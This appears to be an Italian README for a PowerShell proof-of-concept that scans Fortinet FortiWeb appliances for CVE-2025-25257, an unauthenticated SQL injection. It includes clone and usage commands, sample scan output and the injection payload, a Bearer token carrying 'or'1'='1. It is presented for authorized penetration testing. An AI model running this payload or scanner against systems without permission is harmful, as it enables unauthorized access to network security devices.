
CVE-2025-25257 PoC per uso educativo e/o test di penetrazione autorizzati.
Questo script PowerShell è progettato esclusivamente per test di penetrazione autorizzati. Verifica gli appliance Fortinet FortiWeb per la CVE-2025-25257, una vulnerabilità di SQL injection non autenticata nell'endpoint /api/fabric/device/status.
Lo script:
Avviso importante:
Questo strumento è destinato esclusivamente a un uso etico e autorizzato in scenari di test di penetrazione o valutazione delle vulnerabilità. L'uso non autorizzato potrebbe violare leggi come il Computer Fraud and Abuse Act (CFAA) o normative equivalenti nella vostra giurisdizione. Assicuratevi di avere il permesso esplicito del proprietario del target prima di eseguire questo script. L'autore non si assume alcuna responsabilità per un uso improprio.
Invoke-WebRequest integrato.git clone https://github.com/mr-r3b00t/CVE-2025-25257.git
cd CVE-2025-25257
Lo script si trova in script.ps1.
Eseguire lo script da PowerShell con una delle seguenti opzioni:
Specificare un singolo indirizzo IP o nome DNS, opzionalmente con una porta (ad es., 192.168.1.1:443).
.\script.ps1 -Target "192.168.1.1:443"
Oppure senza porta (scansiona le porte predefinite):
.\script.ps1 -Target "example.com"
Fornire un file di testo con un target per riga (ad es., targets.txt).
.\script.ps1 -InputFile "targets.txt"
Contenuto di esempio di targets.txt:
192.168.1.1:443
example.com
10.0.0.1
Lo script restituirà i risultati per ogni target e porta, inclusi:
Output di esempio:
Testing https://192.168.1.1:443/api/fabric/device/status for CVE-2025-25257
Endpoint accessible (HEAD 200 OK). Proceeding with GET request for vulnerability test.
GET Response Status: 200
Potential vulnerability detected (200 OK with payload). Check content for confirmation.
GET Response Content: {"devices": [...]}
Authorization (Bearer AAAAAA'or'1'='1).Contributi benvenuti! Effettuare il fork del repository e inviare una pull request con miglioramenti, correzioni di bug o funzionalità aggiuntive.
Questo progetto è concesso in licenza sotto la MIT License - vedere il file LICENSE per i dettagli.
Per domande o problemi, aprire una issue su GitHub.